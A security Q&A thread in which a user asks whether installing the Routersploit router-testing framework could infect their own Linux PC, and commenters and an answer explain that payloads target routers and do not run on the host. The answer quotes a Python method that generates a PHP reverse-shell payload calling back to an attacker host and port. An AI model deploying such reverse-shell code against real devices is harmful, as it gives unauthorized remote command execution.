# Does Routersploit install any malware or executables on my PC?

Tags: exploit, metasploit, router, exploit-kits

If I install Routersploit on my PC, would it install any malware or executable binaries as part of it to PC? Even though developers of Routersploit do not have any nefarious intention to add malware, my limited understanding about exploits is that they may contain executable malware or binaries. Which they use as payloads.

My fear is that if I install Routersploit, it may install some binaries as part of its payloads and this binaries may make my PC vulnurable to any other malwares. I know router executables and executables for PC are different. Binaries intended for one may not work on another, still I want to know if there is even a slight chance of risk. I use an LUbuntu PC.

The reason I am worried about this is, I want to test a router for vulnerabilities and I have only one computer to do it. It's a legacy one so installing virtual machine is not possible.

Comment: Installing the *framework* does not mean that it installs the *exploits* on your machine.

Comment: @schroeder, can malware or executable binary contained in the payload of routersploit be accidently triggered in pc on which routersploit is Runa and thus infecting this PC ?

Comment: Do you normally find that programs randomly start on your PC?

Comment: most machines from the last 30 years can run a VM tool, so I don't see why it being legacy is the reason to not be able to run a VM. (unless your proc is missing some specific instruction sets) -just fyi

Comment: @Schroeder , I have not installed it yet. I am worried about possible infection when I trigger Routersploit from my pc

Comment: Yes, I understand that you haven't installed it yet. I'm asking if you find that in general, programs run for no reason. Just by *having* the binaries does not mean that they will be run on your machine.

Comment: @schroeder ,  No, binaries do not run automatically run on my machines, at least I haven't noticed so, but binaries ,if any as part of routersploit payloaf, may run if I started routersploit from my PC. The payloads are intended to hack target ,so it can inadvertently hack machines from which routersploit is triggered. That is my concern

Answer (score 0):

Routersploit, when installed and used properly, should not install malware or executable binaries on your PC. Its purpose is to facilitate penetration testing and security assessment of network devices, primarily routers. While it may contain code for payloads to exploit vulnerabilities in routers, these payloads are designed to interact with the target devices, not your computer.

In the [source code](https://github.com/threat9/routersploit/blob/master/routersploit/modules/payloads/php/reverse_tcp.py), there are **no actual files that run a payload when being executed**. All you can find is Python code that can generate code for a payload in different languages like Python or PHP, which makes it practically almost impossible to accidently harm your system.
For example this Python code, located at `routersploit/modules/payloads/php/reverse_tcp.py`, returns PHP code for a reverse shell that will be executed on the target devices.

```
 def generate(self):
        return (
            "$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) +
            "while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
        )
```